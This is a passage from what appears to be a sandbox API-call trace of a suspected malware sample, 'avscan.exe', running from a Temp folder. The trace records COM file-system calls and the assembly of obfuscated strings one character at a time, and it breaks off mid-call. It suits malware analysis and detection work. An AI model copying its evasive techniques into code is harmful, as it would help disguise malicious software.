wParam=0x208, lParam=0x28e350) returned 0x0 [0165.313] NtdllDefWindowProc_A (hWnd=0x103e6, Msg=0x7f, wParam=0x2, lParam=0x0) returned 0x1300c5 [0165.318] NtdllDefWindowProc_A (hWnd=0x103e6, Msg=0xd, wParam=0x208, lParam=0x28e3b0) returned 0x0 [0165.319] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103ec, Msg=0xc5, wParam=0x0, lParam=0x0) returned 0x1 [0165.319] GetFocus () returned 0x0 [0165.319] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103ee, Msg=0xc5, wParam=0x0, lParam=0x0) returned 0x1 [0165.320] GetFocus () returned 0x0 [0165.320] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103f0, Msg=0xc5, wParam=0x0, lParam=0x0) returned 0x1 [0165.320] GetFocus () returned 0x0 [0165.320] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103f2, Msg=0xc5, wParam=0x0, lParam=0x0) returned 0x1 [0165.320] GetFocus () returned 0x0 [0165.320] IsIconic (hWnd=0x103e6) returned 0 [0165.320] IsZoomed (hWnd=0x103e6) returned 0 [0165.320] GetClientRect (in: hWnd=0x103e6, lpRect=0x28fb24 | out: lpRect=0x28fb24) returned 1 [0165.320] GetWindow (hWnd=0x103e6, uCmd=0x5) returned 0x103e8 [0165.321] GetWindow (hWnd=0x103e8, uCmd=0x2) returned 0x103ea [0165.321] GetParent (hWnd=0x103e8) returned 0x103e6 [0165.321] GetWindow (hWnd=0x103ea, uCmd=0x2) returned 0x103ec [0165.321] GetParent (hWnd=0x103ea) returned 0x103e6 [0165.321] GetWindow (hWnd=0x103ec, uCmd=0x2) returned 0x103ee [0165.321] GetParent (hWnd=0x103ec) returned 0x103e6 [0165.321] GetWindow (hWnd=0x103ee, uCmd=0x2) returned 0x103f0 [0165.321] GetParent (hWnd=0x103ee) returned 0x103e6 [0165.322] GetWindow (hWnd=0x103f0, uCmd=0x2) returned 0x103f2 [0165.322] GetParent (hWnd=0x103f0) returned 0x103e6 [0165.322] GetWindow (hWnd=0x103f2, uCmd=0x2) returned 0x103f4 [0165.322] GetParent (hWnd=0x103f2) returned 0x103e6 [0165.322] GetWindow (hWnd=0x103f4, uCmd=0x2) returned 0x103f6 [0165.322] GetParent (hWnd=0x103f4) returned 0x103e6 [0165.323] GetWindow (hWnd=0x103f6, uCmd=0x2) returned 0x103f8 [0165.323] GetParent (hWnd=0x103f6) returned 0x103e6 [0165.323] GetWindow (hWnd=0x103f8, uCmd=0x2) returned 0x0 [0165.323] GetParent (hWnd=0x103f8) returned 0x103e6 [0165.324] CLSIDFromProgIDEx (in: lpszProgID="scripting.filesystemobject", lpclsid=0x28f5f0 | out: lpclsid=0x28f5f0*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0 [0165.341] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0165.341] CoCreateInstance (in: rclsid=0x28f5f0*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), pUnkOuter=0x0, dwClsContext=0x5, riid=0x7295a460*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28f694 | out: ppv=0x28f694*=0x13a2be0) returned 0x0 [0165.350] SysReAllocStringLen (in: pbstr=0x28e44c*=0x0, psz="SXS.DLL", len=0x7 | out: pbstr=0x28e44c*="SXS.DLL") returned 1 [0165.351] CharLowerBuffW (in: lpsz="SXS.DLL", cchLength=0x7 | out: lpsz="sxs.dll") returned 0x7 [0165.351] LoadLibraryW (lpLibFileName="SXS.DLL") returned 0x72ec0000 [0165.351] GetLastError () returned 0x0 [0165.351] SetLastError (dwErrCode=0x0) [0165.351] GetProcAddress (hModule=0x72ec0000, lpProcName="SxsOleAut32RedirectTypeLibrary") returned 0x72ec207d [0165.353] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr="ADVAPI32.dll", cbMultiByte=12, lpWideCharStr=0x28d3b8, cchWideChar=2047 | out: lpWideCharStr="ADVAPI32.dllƬć") returned 12 [0165.353] SysReAllocStringLen (in: pbstr=0x28e3bc*=0x0, psz="ADVAPI32.dll", len=0xc | out: pbstr=0x28e3bc*="ADVAPI32.dll") returned 1 [0165.353] CharLowerBuffW (in: lpsz="ADVAPI32.dll", cchLength=0xc | out: lpsz="advapi32.dll") returned 0xc [0165.353] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x76f40000 [0165.354] GetLastError () returned 0x0 [0165.354] SetLastError (dwErrCode=0x0) [0165.354] GetProcAddress (hModule=0x76f40000, lpProcName="RegOpenKeyW") returned 0x76f52459 [0165.356] GetProcAddress (hModule=0x76f40000, lpProcName="RegQueryValueW") returned 0x76f544b4 [0165.369] GetProcAddress (hModule=0x72ec0000, lpProcName="SxsOleAut32MapConfiguredClsidToReferenceClsid") returned 0x72ec171e [0165.369] FileSystemObject:IUnknown:QueryInterface (in: This=0x13a2be0, riid=0x72970540*(Data1=0x7fd52380, Data2=0x4e07, Data3=0x101b, Data4=([0]=0xae, [1]=0x2d, [2]=0x8, [3]=0x0, [4]=0x2b, [5]=0x2e, [6]=0xc7, [7]=0x13)), ppvObject=0x28f6a4 | out: ppvObject=0x28f6a4*=0x0) returned 0x80004002 [0165.369] FileSystemObject:IUnknown:QueryInterface (in: This=0x13a2be0, riid=0x72970750*(Data1=0x37d84f60, Data2=0x42cb, Data3=0x11ce, Data4=([0]=0x81, [1]=0x35, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xb8, [7]=0x51)), ppvObject=0x28f6a8 | out: ppvObject=0x28f6a8*=0x0) returned 0x80004002 [0165.369] FileSystemObject:IUnknown:QueryInterface (in: This=0x13a2be0, riid=0x72970450*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28f674 | out: ppvObject=0x28f674*=0x13a2be0) returned 0x0 [0165.369] FileSystemObject:IUnknown:Release (This=0x13a2be0) returned 0x1 [0165.370] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x13a2be0, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28f640*="getspecialfolder", cNames=0x1, lcid=0x409, rgDispId=0x28f644 | out: rgDispId=0x28f644*=10014) returned 0x0 [0165.371] FileSystemObject:IDispatch:Invoke (in: This=0x13a2be0, dispIdMember=10014, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x28f614*(rgvarg=([0]=0x28f69c*(varType=0x2, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x28f8a8, pExcepInfo=0x28f5f4, puArgErr=0x28f624 | out: pDispParams=0x28f614*(rgvarg=([0]=0x28f69c*(varType=0x2, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x28f8a8*(varType=0x9, wReserved1=0x0, wReserved2=0x18, wReserved3=0x0, varVal1=0x13a2c3c, varVal2=0x0), pExcepInfo=0x28f5f4*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x28f624*=0x72a478d9) returned 0x0 [0165.372] FileSystemObject:IUnknown:AddRef (This=0x13a2c3c) returned 0x2 [0165.372] FileSystemObject:IUnknown:Release (This=0x13a2c3c) returned 0x1 [0165.372] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x13a2be0, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28f640*="getspecialfolder", cNames=0x1, lcid=0x409, rgDispId=0x28f644 | out: rgDispId=0x28f644*=10014) returned 0x0 [0165.373] FileSystemObject:IDispatch:Invoke (in: This=0x13a2be0, dispIdMember=10014, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x28f614*(rgvarg=([0]=0x28f69c*(varType=0x2, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x28f8a8, pExcepInfo=0x28f5f4, puArgErr=0x28f624 | out: pDispParams=0x28f614*(rgvarg=([0]=0x28f69c*(varType=0x2, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x28f8a8*(varType=0x9, wReserved1=0x0, wReserved2=0x18, wReserved3=0x0, varVal1=0x13a2cec, varVal2=0x0), pExcepInfo=0x28f5f4*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x28f624*=0x72a478d9) returned 0x0 [0165.373] FileSystemObject:IUnknown:AddRef (This=0x13a2cec) returned 0x2 [0165.373] FileSystemObject:IUnknown:Release (This=0x13a2cec) returned 0x1 [0165.380] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0xfc) returned 0x2c8bbb8 [0165.380] GetCurrentThreadId () returned 0xba4 [0165.380] GetCurrentThreadId () returned 0xba4 [0165.380] GetCurrentThreadId () returned 0xba4 [0165.380] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x0, Size=0x12) returned 0x2c82ad8 [0165.381] SetWindowTextA (hWnd=0x103de, lpString="Using Shell32.dll") returned 1 [0165.381] NtdllDefWindowProc_A (hWnd=0x103de, Msg=0xc, wParam=0x0, lParam=0x2c82ad8) returned 0x1 [0165.381] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x0, Size=0x1) returned 0x2c8bcc0 [0165.381] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x0, Size=0x12) returned 0x2c82af8 [0165.381] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x0, Size=0x12) returned 0x2c82b18 [0165.381] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x15) returned 0x2c82b38 [0165.381] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x28f508, nSize=0x104 | out: lpFilename="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\avscan.exe")) returned 0x2f [0165.382] lstrcpynA (in: lpString1=0x28f3f4, lpString2="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", iMaxLength=260 | out: lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe") returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe" [0165.382] lstrlenA (lpString="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe") returned 47 [0165.382] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x0, Size=0x30) returned 0x2c8bcd0 [0165.382] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x0, Size=0x30) returned 0x2c8bd08 [0165.382] lstrcpyA (in: lpString1=0x2c8bcd0, lpString2="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe" | out: lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe") returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe" [0165.385] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x0, Size=0x25) returned 0x2c8bd40 [0165.385] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c8bd08 | out: hHeap=0x2c70000) returned 1 [0165.386] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c8bcd0 | out: hHeap=0x2c70000) returned 1 [0165.386] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 37 [0165.386] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", cbMultiByte=-1, lpWideCharStr=0x108fbdc, cchWideChar=37 | out: lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp") returned 37 [0165.386] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c8bd40 | out: hHeap=0x2c70000) returned 1 [0165.386] SysStringLen (param_1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp") returned 0x24 [0165.386] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", cchWideChar=37, lpMultiByteStr=0x108fc44, cbMultiByte=73, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", lpUsedDefaultChar=0x0) returned 37 [0165.388] SetWindowTextA (hWnd=0x103ee, lpString="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp") returned 1 [0165.389] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103ee, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x5 [0165.389] GetFocus () returned 0x0 [0165.389] lstrlenA (lpString="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp") returned 36 [0165.389] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103ee, Msg=0xc, wParam=0x0, lParam=0x108fc44) returned 0x1 [0165.389] IsWindow (hWnd=0x103ee) returned 1 [0165.389] IsWindow (hWnd=0x103ee) returned 1 [0165.390] IsWindow (hWnd=0x103ee) returned 1 [0165.390] IsWindow (hWnd=0x103ee) returned 1 [0165.390] GetFocus () returned 0x0 [0165.395] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="O", cchWideChar=1, lpMultiByteStr=0x28f6aa, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O\x01 ú(", lpUsedDefaultChar=0x0) returned 1 [0165.395] VarAdd (in: pvarLeft=0x28f90c, pvarRight=0x28f838, pvarResult=0x28f8a8 | out: pvarResult=0x28f8a8) returned 0x0 [0165.396] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0x1090de4, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0165.396] VarCat (in: pvarLeft=0x28f95c, pvarRight=0x28f8dc, pvarResult=0x28f8a8 | out: pvarResult=0x28f8a8) returned 0x0 [0165.396] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="T", cchWideChar=1, lpMultiByteStr=0x28f6aa, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="T\x01 ú(", lpUsedDefaultChar=0x0) returned 1 [0165.396] VarAdd (in: pvarLeft=0x28f90c, pvarRight=0x28f838, pvarResult=0x28f8a8 | out: pvarResult=0x28f8a8) returned 0x0 [0165.397] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0x1090ccc, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0165.397] VarCat (in: pvarLeft=0x28f95c, pvarRight=0x28f8dc, pvarResult=0x28f8a8 | out: pvarResult=0x28f8a8) returned 0x0 [0165.397] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x28f6aa, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i\x01 ú(", lpUsedDefaultChar=0x0) returned 1 [0165.397] VarAdd (in: pvarLeft=0x28f90c, pvarRight=0x28f838, pvarResult=0x28f8a8 | out: pvarResult=0x28f8a8) returned 0x0 [0165.397] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="v", cbMultiByte=1, lpWideCharStr=0x1090c54, cchWideChar=1 | out: lpWideCharStr="v") returned 1 [0165.398] VarCat (in: pvarLeft=0x28f95c, pvarRight=0x28f8dc, pvarResult=0x28f8a8 | out: pvarResult=0x28f8a8) returned 0x0 [0165.398] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="f", cchWideChar=1, lpMultiByteStr=0x28f6aa, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="f\x01 ú(", lpUsedDefaultChar=0x0) returned 1 [0165.398] VarAdd (in: pvarLeft=0x28f90c, pvarRight=0x28f838, pvarResult=0x28f8a8 | out: pvarResult=0x28f8a8) returned 0x0 [0165.398] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x1090de4, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0165.398] VarCat (in: pvarLeft=0x28f95c, pvarRight=0x28f8dc, pvarResult=0x28f8a8 | out: pvarResult=0x28f8a8) returned 0x0 [0165.399] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="V", cchWideChar=1, lpMultiByteStr=0x28f6aa, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="V\x01 ú(", lpUsedDefaultChar=0x0) returned 1 [0165.399] VarAdd (in: pvarLeft=0x28f90c, pvarRight=0x28f838, pvarResult=0x28f8a8 | out: pvarResult=0x28f8a8) returned 0x0 [0165.399] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="c", cbMultiByte=1, lpWideCharStr=0x1090ccc, cchWideChar=1 | out: lpWideCharStr="c") returned 1 [0165.399] VarCat (in: pvarLeft=0x28f95c, pvarRight=0x28f8dc, pvarResult=0x28f8a8 | out: pvarResult=0x28f8a8) returned 0x0 [0165.400] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="T", cchWideChar=1, lpMultiByteStr=0x28f6aa, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="T\x01 ú(", lpUsedDefaultChar=0x0) returned 1 [0165.400] VarAdd (in: pvarLeft=0x28f90c, pvarRight=0x28f838, pvarResult=0x28f8a8 | out: pvarResult=0x28f8a8) returned 0x0 [0165.400] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0x1090c54, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0165.400] VarCat (in: pvarLeft=0x28f95c, pvarRight=0x28f8dc, pvarResult=0x28f8a8 | out: pvarResult=0x28f8a8) returned 0x0 [0165.401] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="a", cchWideChar=1, lpMultiByteStr=0x28f6aa, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="a\x01 ú(", lpUsedDefaultChar=0x0) returned 1 [0165.401] VarAdd (in: pvarLeft=0x28f90c, pvarRight=0x28f838, pvarResult=0x28f8a8 | out: pvarResult=0x28f8a8) returned 0x0 [0165.401] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x1090de4, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0165.401] VarCat (in: pvarLeft=0x28f95c, pvarRight=0x28f8dc, pvarResult=0x28f8a8 | out: pvarResult=0x28f8a8) returned 0x0 [0165.402] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="!", cchWideChar=1, lpMultiByteStr=0x28f6aa, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="!\x01 ú(", lpUsedDefaultChar=0x0) returned 1 [0165.402] VarAdd (in: pvarLeft=0x28f90c, pvarRight=0x28f838, pvarResult=0x28f8a8 | out: pvarResult=0x28f8a8) returned 0x0 [0165.402] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=".", cbMultiByte=1, lpWideCharStr=0x1090ccc, cchWideChar=1 | out: lpWideCharStr=".") returned 1 [0165.402] VarCat (in: pvarLeft=0x28f95c, pvarRight=0x28f8dc, pvarResult=0x28f8a8 | out: pvarResult=0x28f8a8) returned 0x0 [0165.403] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="X", cchWideChar=1, lpMultiByteStr=0x28f6aa, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="X\x01 ú(", lpUsedDefaultChar=0x0) returned 1 [0165.403] VarAdd (in: pvarLeft=0x28f90c, pvarRight=0x28f838, pvarResult=0x28f8a8 | out: pvarResult=0x28f8a8) returned 0x0 [0165.403] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x1090c54, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0165.403] VarCat (in: pvarLeft=0x28f95c, pvarRight=0x28f8dc, pvarResult=0x28f8a8 | out: pvarResult=0x28f8a8) returned 0x0 [0165.403] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="k", cchWideChar=1, lpMultiByteStr=0x28f6aa, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="k\x01 ú(", lpUsedDefaultChar=0x0) returned 1 [0165.404] VarAdd (in: pvarLeft=0x28f90c, pvarRight=0x28f838, pvarResult=0x28f8a8 | out: pvarResult=0x28f8a8) returned 0x0 [0165.404] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="x", cbMultiByte=1, lpWideCharStr=0x1090de4, cchWideChar=1 | out: lpWideCharStr="x") returned 1 [0165.404] VarCat (in: pvarLeft=0x28f95c, pvarRight=0x28f8dc, pvarResult=0x28f8a8 | out: pvarResult=0x28f8a8) returned 0x0 [0165.404] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="X", cchWideChar=1, lpMultiByteStr=0x28f6aa, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="X\x01 ú(", lpUsedDefaultChar=0x0) returned 1 [0165.404] VarAdd (in: pvarLeft=0x28f90c, pvarRight=0x28f838, pvarResult=0x28f8a8 | out: pvarResult=0x28f8a8) returned 0x0 [0165.405] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x1090ccc, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0165.405] VarCat (in: pvarLeft=0x28f95c, pvarRight=0x28f8dc, pvarResult=0x28f8a8 | out: pvarResult=0x28f8a8) returned 0x0 [0165.406] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="4", cchWideChar=1, lpMultiByteStr=0x28f6aa, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="4\x01 ú(", lpUsedDefaultChar=0x0) returned 1 [0165.406] VarAdd (in: pvarLeft=0x28f8cc, pvarRight=0x28f838, pvarResult=0x28f8a8 | out: pvarResult=0x28f8a8) returned 0x0 [0165.406] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="A", cbMultiByte=1, lpWideCharStr=0x1090c54, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0165.406] VarCat (in: pvarLeft=0x28f91c, pvarRight=0x28f96c, pvarResult=0x28f8a8 | out: pvarResult=0x28f8a8) returned 0x0 [0165.406] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="I", cchWideChar=1, lpMultiByteStr=0x28f6aa, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="I\x01 ú(", lpUsedDefaultChar=0x0) returned 1 [0165.406] VarAdd (in: pvarLeft=0x28f8cc, pvarRight=0x28f838, pvarResult=0x28f8a8 | out: pvarResult=0x28f8a8) returned 0x0 [0165.406] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="V", cbMultiByte=1, lpWideCharStr=0x1090c7c, cchWideChar=1 | out: lpWideCharStr="V") returned 1 [0165.407] VarCat (in: pvarLeft=0x28f91c, pvarRight=0x28f96c, pvarResult=0x28f8a8 | out: pvarResult=0x28f8a8) returned 0x0 [0165.412] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="F", cchWideChar=1, lpMultiByteStr=0x28f6aa, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="F\x01 ú(", lpUsedDefaultChar=0x0) returned 1 [0165.412] VarAdd (in: pvarLeft=0x28f8cc, pvarRight=0x28f838, pvarResult=0x28f8a8 | out: pvarResult=0x28f8a8) returned 0x0 [0165.412] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="S", cbMultiByte=1, lpWideCharStr=0x1090ca4, cchWideChar=1 | out: lpWideCharStr="S") returned 1 [0165.412] VarCat (in: pvarLeft=0x28f91c, pvarRight=0x28f96c, pvarResult=0x28f8a8 | out: pvarResult=0x28f8a8) returned 0x0 [0165.413] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="6", cchWideChar=1, lpMultiByteStr=0x28f6aa, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="6\x01 ú(", lpUsedDefaultChar=0x0) returned 1 [0165.413] VarAdd (in: pvarLeft=0x28f8cc, pvarRight=0x28f838, pvarResult=0x28f8a8 | out: pvarResult=0x28f8a8) returned 0x0 [0165.413] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="C", cbMultiByte=1, lpWideCharStr=0x1090c54, cchWideChar=1 | out: lpWideCharStr="C") returned 1 [0165.413] VarCat (in: pvarLeft=0x28f91c, pvarRight=0x28f96c, pvarResult=0x28f8a8 | out: pvarResult=0x28f8a8) returned 0x0 [0165.413] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="4", cchWideChar=1, lpMultiByteStr=0x28f6aa, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="4\x01 ú(", lpUsedDefaultChar=0x0) returned 1 [0165.414] VarAdd (in: pvarLeft=0x28f8cc, pvarRight=0x28f838, pvarResult=0x28f8a8 | out: pvarResult=0x28f8a8) returned 0x0 [0165.414] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="A", cbMultiByte=1, lpWideCharStr=0x1090c7c, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0165.414] VarCat (in: pvarLeft=0x28f91c, pvarRight=0x28f96c, pvarResult=0x28f8a8 | out: pvarResult=0x28f8a8) returned 0x0 [0165.414] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="A", cchWideChar=1, lpMultiByteStr=0x28f6aa, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="A\x01 ú(", lpUsedDefaultChar=0x0) returned 1 [0165.414] VarAdd (in: pvarLeft=0x28f8cc, pvarRight=0x28f838, pvarResult=0x28f8a8 | out: pvarResult=0x28f8a8) returned 0x0 [0165.415] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="N", cbMultiByte=1, lpWideCharStr=0x1090ca4, cchWideChar=1 | out: lpWideCharStr="N") returned 1 [0165.415] VarCat (in: pvarLeft=0x28f91c, pvarRight=0x28f96c, pvarResult=0x28f8a8 | out: pvarResult=0x28f8a8) returned 0x0 [0165.416] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=";", cchWideChar=1, lpMultiByteStr=0x28f6aa, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=";\x01 ú(", 